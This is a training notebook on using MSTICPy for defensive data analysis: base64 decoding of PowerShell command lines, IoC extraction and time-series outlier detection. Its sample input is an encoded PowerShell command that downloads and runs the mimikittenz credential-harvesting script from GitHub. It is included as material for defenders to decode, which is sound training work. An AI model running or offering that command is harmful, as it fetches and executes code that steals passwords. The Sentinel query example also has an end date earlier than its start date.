## MSTICPy and Notebooks in InfoSec

---

<h1 style="border: solid; padding:5pt; color:black; background-color:#909090">Session 6 - Data analysis</h1>

---

## What this session covers:

* Data Analysis capabilities in msticpy
* Base 64 decoding
* IoC Extraction
* Outlier detection using Time Series Analysis


## Prerequisites
- Python >= 3.8 Environment
- Jupyter installed
- MSTICPy installed

## Recommended
- VS Code


---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">Data Analysis capabilities in msticpy</a>

---

MSTICPy has several generic analysis and transformation functions. Some examples of transforms are:
- Process tree building
- decoding encoded and compressed data
- IoC/observable extraction from data
- Time series analysis
- syslog parsing

You can read more about the features in MSTICPy documentation.
 - [Data Analysis](https://msticpy.readthedocs.io/en/latest/DataAnalysis.html)
 - [Process Trees](https://msticpy.readthedocs.io/en/latest/visualization/ProcessTree.html)

---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">Base 64 decoding using msticpy</a>

---

Often, Defenders have to bulk analyze the process execution commandline logs containing base64 encoded strings by decoding and analyzing them for malicious activity. 
This msticpy module allows you to extract base64 encoded content from a string or columns of Pandas DataFrame. 

Read more details - 
[Base64 Decoding and Unpacking](https://msticpy.readthedocs.io/en/latest/data_analysis/Base64Unpack.html)

In [ ]:
%env MSTICPYCONFIG=./msticpyconfig.yaml
import msticpy as mp 
mp.init_notebook()
pd.set_option('display.max_colwidth', 200)

In order to find module path, you can use search feature as shows below

In [ ]:
mp.search('base64')

Once you identified the module path, you can use either on a input string or columns of Padas dataframe.

Exmaple powershell command string with base64 encoded data. We can put this as input in next step.

`powershell -enc SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcHV0dGVycGFuZGEvbWltaWtpdHRlbnovbWFzdGVyL0ludm9rZS1taW1pa2l0dGVuei5wczEnKTsgSW52b2tlLW1pbWlraXR0ZW56Cg==`

In [ ]:
cmdline = mp.nbwidgets.GetText(prompt='Enter a commandline with powershell base64 encoded', auto_display=True);

in order to decode, you can use `unpack` method within `base64unpack` tranform module/
The library returns following information.
- decoded string (if decodable to utf-8 or utf-16)
- hashes of the decoded segment (MD5, SHA1, SHA256)
- string of printable byte values (e.g. for submission to a disassembler)
- the detected decoded file type (limited)

In [ ]:
# Decode the string
base64_dec_str = mp.transform.base64unpack.unpack(input_string=cmdline.value)

# Print decoded string
display(base64_dec_str[0])

In [ ]:
# Print decoded string
display(base64_dec_str[1]['decoded_string'][0])

## <a style="border: solid; padding:5pt; color:black; background-color:#309030">Task 1 - Base 64 decoding using dataframe as input</a>

Perform base 64 encoding on the data loaded from previous step.
1. Choose the columns containing powershell base64 command line logs.
2. Use python help (`process_enc_logs.mp.b64unpack` or `mp.transform.base64unpack.unpack_df`)
   to find correct parameters such as input data and column name.
3. Finally display the results

<br>
<details>
<summary>Hints...</summary>
<li>Use the cell below to identify the columns containing powershell base64 encoded logs.</li>
<li>Use data and column to specify input dataframe and column containing powershell command line</li>
<li>The final command to decode should look like one of the following.

<pre>
    # using the pandas msticpy accessor
    process_enc_logs.mp.b64extract(column='CommandLine')
</pre>

<pre>
    # using the standalone function
    mp.transform.base64unpack.unpack_df(data=process_enc_logs, column='CommandLine')
</pre>
</li>
<ul>
</ul>
</details>

In [ ]:
# Load test data
process_logs = pd.read_pickle('data/processes_on_host.pkl')
# Filter the records with powershell base 64 encoded data
process_enc_logs = process_logs[process_logs['CommandLine'].str.contains("-enc")]
process_enc_logs

In [ ]:
# specify the data and column parameters using mp transform
dec_df = 

# display dataframe
display(dec_df)

In [ ]:
# specify the column parameters using msticpy accessor
dec_df = 

# display dataframe
display(dec_df)

---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">IoC extraction using msticpy</a>

---

This module allows you to extract IoC patterns from a string or a DataFrame. This will be useful feature for defender for faster extraction and perform follow-up activities on those IoCs.

For more detail - [IoC Extraction](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html)

You can use this module similar fashion either by providing input string or passing a dataframe with multiple logs containing IoCs.

Enter sample command line in the next cell to see how it works. 
`netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt`

In [ ]:
cmdline = mp.nbwidgets.GetText(prompt='Enter a commandline to extract IoCs', auto_display=True);

You can use the `extract` method from `iocextract` class and provide input string.

In [ ]:
# Find the module path
mp.search('ioc')

In [ ]:
ioc_extractor = mp.transform.IoCExtract()

# any IoCs in the string?
iocs_found = ioc_extractor.extract(cmdline.value)

if iocs_found:
    print('\nPotential IoCs found in alert process:')
    display(iocs_found)

## <a style="border: solid; padding:5pt; color:black; background-color:#309030">Task 2 - Extract IoCs from log dataset</a>

Perform IoC extraction on the data loaded from previous step (process_enc_logs).
1. Choose the columns containing command line logs which may have IoCs and need to be extracted.
2. Use either of these (use Python help to find correct parameters such as input data and column name):
   - the DataFrame accessor process_enc_logs.mp.iocextract() function
   - the `extract` method of the `mp.transform.IoCextractor` class
3. Finally display the results


<br>
<details>
<summary>Hints...</summary>
<li>Use the cell below to identify the columns containing powershell base64 encoded logs.</li>
<li>Use data and column to specify input dataframe and column containing powershell commandline</li>
<li>Use the DataFrame accessor
<pre>
    process_logs.mp.ioc_extract(columns='CommandLine')
</pre>
</li>
<li>Or use the IoCExtract class method
<pre>
    ioc_extractor.extract(data=process_logs, columns=['CommandLine'])
</pre>
</li>
<ul>
</ul>
</details>


In [ ]:
# Use the standalone function of IoCExtract class. specify data and columns
ioc_df = 

if len(ioc_df):
    display(HTML("<h3>IoC patterns found in process tree.</h3>"))
    display(ioc_df[ioc_df['IoCType']=='url'])

In [ ]:
#Use the dataframe accessor and specify columns
ioc_df = 

if len(ioc_df):
    display(HTML("<h3>IoC patterns found in process tree.</h3>"))
    display(ioc_df[ioc_df['IoCType']=='ipv4'])

---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">Time Series analysis using msticpy</a>

---

MSTICPy has functions to calculate and display time series decomposition results. These can be useful to spot time-based anomalies in something that has a predictable seasonal pattern

Fore more details , check the documentation
[Time Series Analysis](https://msticpy.readthedocs.io/en/latest/visualization/TimeSeriesAnomalies.html)

In [ ]:
mp.search('timeseries')

MSTICPy has a number of built-in queries for MS Sentinel to support time series analysis.

- MultiDataSource.get_timeseries_anomalies
- MultiDataSource.get_timeseries_data
- MultiDataSource.get_timeseries_decompose
- MultiDataSource.plot_timeseries_datawithbaseline
- MultiDataSource.plot_timeseries_scoreanomolies

To use these you will need to connect to sentinel workspace

`# Authentication
qry_prov = mp.QueryProvider("MSSentinel")
qry_prov.connect(mp.WorkspaceConfig(workspace="cybersecuritysoc"))`

An example of running the query against connected sentinel workspace and retrieve the time series data.

```
#Specify start and end timestamps
start='2022-09-01 00:00:00.000000'
end='2020-10-01 00:00:00.000000'

#Execute the query by passing required and optional parameters
time_series_data = qry_prov.MultiDataSource.get_timeseries_data(
    start=start,
    end=end,
    table="CommonSecurityLog",
    timestampcolumn="TimeGenerated",
    aggregatecolumn="SentBytes",
    groupbycolumn="DeviceVendor",
    aggregatefunction="sum(SentBytes)",
    where_clause='| where DeviceVendor=="Fortinet"',
    add_query_items='| mv-expand TimeGenerated to typeof(datetime), SentBytes to typeof(long)',
)
#display the output
time_series_data
```

## <a style="border: solid; padding:5pt; color:black; background-color:#309030">Task 3 - Find outliers using time series analysis on network data</a>

Perform Time series analysis on the sample data loaded in the first step.
1. from the loaded dataframe, use python help (`ts_df.mp_timeseries.analyze`) to find correct parameters such as data_column, seasonal parameteres if known otherwise keep default.
3. Finally plot the time series of the results from previous steps using `ts_decomp_df.mp_timeseries.plot`

<br>
<details>
<summary>Hints...</summary>
<li>Use the cell below to identify the columns containing time series numerical data.</li>
<li>The final command to do time series should look like:
<pre>
    ts_df.mp_timeseries.analyze(
        # time_column="TimeGenerated"  - if the DF is not indexed by timestamp
        data_column="TotalBytesSent",
        seasonal=7,
        period=24
    )
</pre>
</li>
<li>You can also plot the results and outliers using the command.
<pre>
    ts_decomp_df.mp_timeseries.plot(
        y="TotalBytesSent",
    );
</pre>
</li>
<ul>
</ul>
</details>

In [ ]:
# Load test data
ts_df = pd.read_pickle('data/timeseries.pkl')
ts_df

In [ ]:
#load the module
from msticpy.analysis import timeseries

# analyze the time series data and find outliers
ts_decomp_df = ts_df.mp_timeseries.analyze(
    data_column="TotalBytesSent",
    seasonal=7,
    period=24
)

ts_decomp_df

In [ ]:
# plot the results retrieved from previous step.
ts_decomp_df.mp_timeseries.plot(
    y="TotalBytesSent",
);

---
# End of Session
